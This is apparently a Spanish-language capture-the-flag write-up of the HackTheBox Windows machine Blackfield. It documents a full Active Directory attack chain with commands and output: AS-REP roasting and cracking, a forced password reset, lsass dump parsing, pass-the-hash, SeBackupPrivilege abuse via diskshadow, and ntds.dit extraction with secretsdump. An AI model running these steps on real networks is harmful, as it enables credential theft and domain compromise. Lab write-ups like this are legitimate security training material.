Blackfield es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox y es de dificultad Difícil.
En este caso se trata de una máquina basada en el Sistema Operativo Windows.
Índice
Escaneo de puertos
Como de costumbre, agregamos la IP de la máquina Blackfield 10.10.10.192 a /etc/hosts como blackfield.htb y comenzamos con el escaneo de puertos nmap.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 |
# Nmap 7.80 scan initiated Sat Jun 6 22:29:11 2020 as: nmap -sC -sV -Pn -p- -oA nmap/blackfield 10.10.10.192 Nmap scan report for 10.10.10.192 Host is up (0.051s latency). Not shown: 65527 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-07 03:32:36Z) 135/tcp open msrpc Microsoft Windows RPC 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=6/6%Time=5EDBFD0E%P=x86_64-pc-linux-gnu%r(DNSVe SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x SF:04bind\0\0\x10\0\x03"); Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 7h01m30s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-06-07T03:34:57 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Jun 6 22:34:03 2020 -- 1 IP address (1 host up) scanned in 291.32 seconds |
Encontramos varios puertos interesantes así que procedemos con la enumeración de los mismos.
Enumeración
Procedemos entre otras cosas a enumerar el servicio SMB, con la idea de intentar obtener información de los directorios compartidos existentes:
1 2 3 4 5 6 7 8 9 10 11 12 13 |
$ smbclient -L \\\\10.10.10.192\\ Enter WORKGROUP\root's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share forensic Disk Forensic / Audit share. IPC$ IPC Remote IPC NETLOGON Disk Logon server share profiles$ Disk SYSVOL Disk Logon server share SMB1 disabled -- no workgroup available |
Y obtenemos un listado de usuarios en la carpeta profiles$, así que generamos un listado de usuarios con los mismos.
Realizaremos también una enumeración de ldap para intentar obtener más información del dominio:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 |
$ ldapsearch -H ldap://10.10.10.192 -x -s base '' "(objectClass=*)" "*" # extended LDIF # # LDAPv3 # base <> (default) with scope baseObject # filter: (objectclass=*) # requesting: (objectClass=*) * # # dn: domainFunctionality: 7 forestFunctionality: 7 domainControllerFunctionality: 7 rootDomainNamingContext: DC=BLACKFIELD,DC=local ldapServiceName: BLACKFIELD.local:dc01$@BLACKFIELD.LOCAL isGlobalCatalogReady: TRUE supportedSASLMechanisms: GSSAPI supportedSASLMechanisms: GSS-SPNEGO supportedSASLMechanisms: EXTERNAL supportedSASLMechanisms: DIGEST-MD5 supportedLDAPVersion: 3 supportedLDAPVersion: 2 supportedLDAPPolicies: MaxPoolThreads supportedLDAPPolicies: MaxPercentDirSyncRequests supportedLDAPPolicies: MaxDatagramRecv supportedLDAPPolicies: MaxReceiveBuffer supportedLDAPPolicies: InitRecvTimeout supportedLDAPPolicies: MaxConnections supportedLDAPPolicies: MaxConnIdleTime supportedLDAPPolicies: MaxPageSize supportedLDAPPolicies: MaxBatchReturnMessages supportedLDAPPolicies: MaxQueryDuration supportedLDAPPolicies: MaxDirSyncDuration supportedLDAPPolicies: MaxTempTableSize supportedLDAPPolicies: MaxResultSetSize supportedLDAPPolicies: MinResultSets supportedLDAPPolicies: MaxResultSetsPerConn supportedLDAPPolicies: MaxNotificationPerConn supportedLDAPPolicies: MaxValRange supportedLDAPPolicies: MaxValRangeTransitive supportedLDAPPolicies: ThreadMemoryLimit supportedLDAPPolicies: SystemMemoryLimitPercent supportedControl: 1.2.840.113556.1.4.319 supportedControl: 1.2.840.113556.1.4.801 supportedControl: 1.2.840.113556.1.4.473 supportedControl: 1.2.840.113556.1.4.528 supportedControl: 1.2.840.113556.1.4.417 supportedControl: 1.2.840.113556.1.4.619 supportedControl: 1.2.840.113556.1.4.841 supportedControl: 1.2.840.113556.1.4.529 supportedControl: 1.2.840.113556.1.4.805 supportedControl: 1.2.840.113556.1.4.521 supportedControl: 1.2.840.113556.1.4.970 supportedControl: 1.2.840.113556.1.4.1338 supportedControl: 1.2.840.113556.1.4.474 supportedControl: 1.2.840.113556.1.4.1339 supportedControl: 1.2.840.113556.1.4.1340 supportedControl: 1.2.840.113556.1.4.1413 supportedControl: 2.16.840.1.113730.3.4.9 supportedControl: 2.16.840.1.113730.3.4.10 supportedControl: 1.2.840.113556.1.4.1504 supportedControl: 1.2.840.113556.1.4.1852 supportedControl: 1.2.840.113556.1.4.802 supportedControl: 1.2.840.113556.1.4.1907 supportedControl: 1.2.840.113556.1.4.1948 supportedControl: 1.2.840.113556.1.4.1974 supportedControl: 1.2.840.113556.1.4.1341 supportedControl: 1.2.840.113556.1.4.2026 supportedControl: 1.2.840.113556.1.4.2064 supportedControl: 1.2.840.113556.1.4.2065 supportedControl: 1.2.840.113556.1.4.2066 supportedControl: 1.2.840.113556.1.4.2090 supportedControl: 1.2.840.113556.1.4.2205 supportedControl: 1.2.840.113556.1.4.2204 supportedControl: 1.2.840.113556.1.4.2206 supportedControl: 1.2.840.113556.1.4.2211 supportedControl: 1.2.840.113556.1.4.2239 supportedControl: 1.2.840.113556.1.4.2255 supportedControl: 1.2.840.113556.1.4.2256 supportedControl: 1.2.840.113556.1.4.2309 supportedControl: 1.2.840.113556.1.4.2330 supportedControl: 1.2.840.113556.1.4.2354 supportedCapabilities: 1.2.840.113556.1.4.800 supportedCapabilities: 1.2.840.113556.1.4.1670 supportedCapabilities: 1.2.840.113556.1.4.1791 supportedCapabilities: 1.2.840.113556.1.4.1935 supportedCapabilities: 1.2.840.113556.1.4.2080 supportedCapabilities: 1.2.840.113556.1.4.2237 subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=BLACKFIELD,DC=lo cal serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configur ation,DC=BLACKFIELD,DC=local schemaNamingContext: CN=Schema,CN=Configuration,DC=BLACKFIELD,DC=local namingContexts: DC=BLACKFIELD,DC=local namingContexts: CN=Configuration,DC=BLACKFIELD,DC=local namingContexts: CN=Schema,CN=Configuration,DC=BLACKFIELD,DC=local namingContexts: DC=DomainDnsZones,DC=BLACKFIELD,DC=local namingContexts: DC=ForestDnsZones,DC=BLACKFIELD,DC=local isSynchronized: TRUE highestCommittedUSN: 167151 dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name, CN=Sites,CN=Configuration,DC=BLACKFIELD,DC=local dnsHostName: DC01.BLACKFIELD.local defaultNamingContext: DC=BLACKFIELD,DC=local currentTime: 20200607033847.0Z configurationNamingContext: CN=Configuration,DC=BLACKFIELD,DC=local # search result search: 2 result: 0 Success # numResponses: 2 # numEntries: 1 |
Descubierto el dominio y, con el listado de usuarios generado, utilizamos la herramienta GetNPUsers de impacket para intentar obtener algún hash:
1 2 3 4 5 6 |
$ GetNPUsers.py -usersfile users.txt -no-pass -dc-ip 10.10.10.192 BLACKFIELD.LOCAL/ | grep -v SessionError Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation [-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set $krb5asrep$23$support@BLACKFIELD.LOCAL:0d0fd51854362b6e93600a1e7c82c695$b51bb67f84d4cd0f0bbef68ab127fdcee47f81bdf55a246f9bd8a88bd77de392920c162cb3b2269d559887dcc13693ebbb8f09661064ed1785914da89708a9b47607d0bb1eb9cbe1e1c9c5e77472d1763280dbe77d13cd11d90e4a76e40959230dc92a801e1ac312169fa362cbb173fbce9e0e577594ab9d30276a2242e291ee325c340a53082edf3551cd2b6a161475b1b502d79b8641df209e514e78765fa386ebb7ac21337b11bebc11cfc0702a4f84ebff610a10d0bc62e1772e8a91d00617b428a9341a028e9765dfbcf316b73a9f4bdff5c78ae4794cfdb8286aef2fb9621a5087568d5cf2f41449ae94d05f925697ad0c [-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set |
Y conseguimos el hash del usuario support. Utilizaremos John The Ripper para intentar descifrar la password del mismo:
1 2 3 4 5 6 7 8 9 |
$ john support.hash -w=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status #00^BlackKnight ($krb5asrep$23$support@BLACKFIELD.LOCAL) 1g 0:00:00:31 DONE (2020-06-07 11:24) 0.03146g/s 451069p/s 451069c/s 451069C/s #1ByNature..#*burberry#*1990 Use the "--show" option to display all of the cracked passwords reliably Session completed |
Y obtenemos la misma:
1 2 3 |
$ john --show support.hash $krb5asrep$23$support@BLACKFIELD.LOCAL:#00^BlackKnight 1 password hash cracked, 0 left |
Con las credenciales obtenidas intentamos obtener más información del dominio y de los usuarios existentes. Utilizaremos bloodhound-python para obtener más información del mismo:
1 2 3 4 5 6 7 8 |
$ bloodhound-python -c ALL -u support -p '#00^BlackKnight' -d BLACKFIELD.local -ns 10.10.10.192 INFO: Found AD domain: blackfield.local INFO: Connecting to LDAP server: dc01.blackfield.local INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 18 computers INFO: Connecting to LDAP server: dc01.blackfield.local INFO: Found 315 users |
Con la información obtenida, descubrimos que podemos resetear el password del usuario audit2020 con el usuario support así que procedemos a realizar el mismo a través de la conexión por rpc:
1 2 3 4 5 |
$ rpcclient -U support //10.10.10.192 Enter WORKGROUP\support's password: rpcclient $> rpcclient $> setuserinfo2 audit2020 23 'Asdf123.' rpcclient $> |
Una vez reseteada, verificamos el acceso con CrackMapExec y vemos que podemos acceder a smb con este usuario:
1 2 3 |
$ cme smb 10.10.10.192 -u audit2020 -p 'Asdf123.' SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False) SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:Asdf123. |
Así que utilizaremos smbmap para comprobar donde tenemos acceso con este usuario:
1 2 3 4 5 6 7 8 9 10 11 |
smbmap -u audit2020 -p 'Asdf123.' -H 10.10.10.192 [+] IP: 10.10.10.192:445 Name: blackfield.htb Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share forensic READ ONLY Forensic / Audit share. IPC$ READ ONLY Remote IPC NETLOGON READ ONLY Logon server share profiles$ READ ONLY SYSVOL READ ONLY Logon server share |
Y observamos que tenemos acceso a la carpeta forensic, a la cual no teníamos anteriormente. Procedemos a descargarnos los ficheros existentes y observamos que se trata de varios ficheros de crash dumps de windows, entre los que encontramos uno muy interesante, lsass.zip:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
$ ls -1 conhost.zip ctfmon.zip dfsrs.zip dllhost.zip ismserv.zip lsass.zip mmc.zip RuntimeBroker.zip ServerManager.zip sihost.zip smartscreen.zip svchost.zip taskhostw.zip winlogon.zip wlms.zip WmiPrvSE.zip |
Extraemos el contenido del fichero zip y trataremos de obtener las credenciales con la herramienta pypykatz:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
$ pypykatz lsa minidump lsass.DMP FILE: ======== lsass.DMP ======= == LogonSession == authentication_id 406458 (633ba) session_id 2 username svc_backup domainname BLACKFIELD logon_server DC01 logon_time 2020-02-23T18:00:03.423728+00:00 sid S-1-5-21-4194615774-2175524697-3563712290-1413 luid 406458 == MSV == Username: svc_backup Domain: BLACKFIELD LM: NA NT: 9658d1d1dcd9250115e2205d9f48400d SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c == WDIGEST [633ba]== username svc_backup domainname BLACKFIELD password None == SSP [633ba]== username domainname password None == Kerberos == Username: svc_backup Domain: BLACKFIELD.LOCAL Password: None == WDIGEST [633ba]== username svc_backup |
En este caso sólo vemos una pequeña parte del contenido obtenido, pero vemos como nos devuelve el hash del usuario svc_backup que utilizaremos posteriormente para loguearnos en el sistema.
Obteniendo la flag de user
Con el hash obtenido, accedemos con la herramienta evil-winrm:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
$ ruby evil-winrm.rb -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192 Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami blackfield\svc_backup *Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ..\desktop *Evil-WinRM* PS C:\Users\svc_backup\desktop> ls Directory: C:\Users\svc_backup\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 6/9/2020 9:30 AM 34 user.txt *Evil-WinRM* PS C:\Users\svc_backup\desktop> |
Y estamos dentro de la máquina, consiguiendo con ello la flag de user.
Escalado de privilegios
Una vez que estamos dentro, revisamos los permisos del usuario:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 |
*Evil-WinRM* PS C:\Users\svc_backup\desktop> whoami /all USER INFORMATION ---------------- User Name SID ===================== ============================================== blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413 GROUP INFORMATION ----------------- Group Name Type SID Attributes ========================================== ================ ============ ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\High Mandatory Level Label S-1-16-12288 PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled USER CLAIMS INFORMATION ----------------------- User claims unknown. Kerberos support for Dynamic Access Control on this device has been disabled. |
Y encontramos dos permisos muy interesantes, SeBackupPrivilege y SeRestorePrivilege.
Revisando en google, encontramos una forma de poder realizar un backup y conseguir los ficheros que necesitamos con la herramienta diskshadow.
Aunque antes de poder hacer esto necesitamos editar los permisos del sistema para poder leer ciertos ficheros para los cuales no tenemos permisos, para ello haremos uso de las acl de windows para cambiar el propietario de los ficheros del sistema.
Y ejecutaremos los siguientes comandos:
1 2 3 4 5 6 7 8 |
powershell -ep bypass $path = "C:\" $user = "blackfield\svc_backup" $acl = get-acl $path $acl_rule = $user,'FullControl','ContainerInherit,ObjectInherit','None','Allow' $access_rule = New-Object System.Security.AccessControl.FileSystemAccessRule $acl_rule $acl.AddAccessRule($access_rule) Set-Acl -Path $path -AclObject $acl |
Una vez hemos establecido los permisos, generaremos nuestro fichero diskshadow.txt con el siguiente contenido:
1 2 3 4 5 6 |
SET CONTEXT PERSISTENT NOWRITERS ADD VOLUME C: ALIAS someAlias CREATE EXPOSE %someAlias% z: RESET EXIT |
Y ejecutaremos el mismo para realizar el backup:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
*Evil-WinRM* PS C:\tmp> diskshadow.exe /s diskshadow.txt Microsoft DiskShadow version 1.0 Copyright (C) 2013 Microsoft Corporation On computer: DC01, 6/10/2020 10:47:57 AM -> set context persistent nowriters -> add volume c: alias someAlias -> create Alias someAlias for shadow ID {1d155cf3-2d05-41b3-8fc0-82239bef3860} set as environment variable. Alias VSS_SHADOW_SET for shadow set ID {f45e1826-fd36-421b-961b-de6e4519294d} set as environment variable. Querying all shadow copies with the shadow copy set ID {f45e1826-fd36-421b-961b-de6e4519294d} * Shadow copy ID = {1d155cf3-2d05-41b3-8fc0-82239bef3860} %someAlias% - Shadow copy set: {f45e1826-fd36-421b-961b-de6e4519294d} %VSS_SHADOW_SET% - Original count of shadow copies = 1 - Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\] - Creation time: 6/10/2020 10:47:57 AM - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 - Originating machine: DC01.BLACKFIELD.local - Service machine: DC01.BLACKFIELD.local - Not exposed - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5} - Attributes: No_Auto_Release Persistent No_Writers Differential Number of shadow copies listed: 1 -> expose %someAlias% z: -> %someAlias% = {1d155cf3-2d05-41b3-8fc0-82239bef3860} The shadow copy was successfully exposed as z:\. -> reset -> exit |
Ahora nos queda acceder al disco z creado con nuestra copia y obtener el fichero ntds.dit:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
*Evil-WinRM* PS z:\> copy z:\windows\ntds\ntds.dit c:\tmp *Evil-WinRM* PS z:\> cd c:\tmp *Evil-WinRM* PS C:\tmp> dir Directory: C:\tmp Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 6/10/2020 10:47 AM 611 2020-06-10_10-47-57_DC01.cab -a---- 6/10/2020 10:47 AM 112 diskshadow.txt -a---- 6/10/2020 10:44 AM 18874368 ntds.dit *Evil-WinRM* PS C:\tmp> download ntds.dit Info: Downloading C:\tmp\ntds.dit to ntds.dit Info: Download successful! *Evil-WinRM* PS C:\tmp> |
Para obtener los hashes necesitaremos también el fichero system, así que haremos una copia desde el registro de windows:
1 |
reg save hklm\system c:\tmp\system |
Y ahora obtendremos los hashes de los usuarios con la tool de impacket secretsdump:
1 |
$ secretsdump.py -ntds ntds.dit -system system LOCAL |
Y conseguiremos las claves de todos los usuarios.
Obteniendo la flag de root
Obtenidos los hashes, sólo nos queda acceder al sistema como admin:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
$ ruby evil-winrm.rb -u Administrator -H XXXXXXXXXXXXXXXXXXXXXXXX -i 10.10.10.192 Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami blackfield\administrator *Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\desktop *Evil-WinRM* PS C:\Users\Administrator\desktop> dir Directory: C:\Users\Administrator\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 2/28/2020 4:36 PM 447 notes.txt -ar--- 6/10/2020 11:04 AM 34 root.txt *Evil-WinRM* PS C:\Users\Administrator\desktop> |
Y ya tenemos nuestra flag de root para completar esta máquina y conseguir nuestros puntos.
Si eres usuario de HackTheBox y te gustó mi writeup, por favor, dame respeto en el siguiente enlace https://www.hackthebox.eu/home/users/profile/103792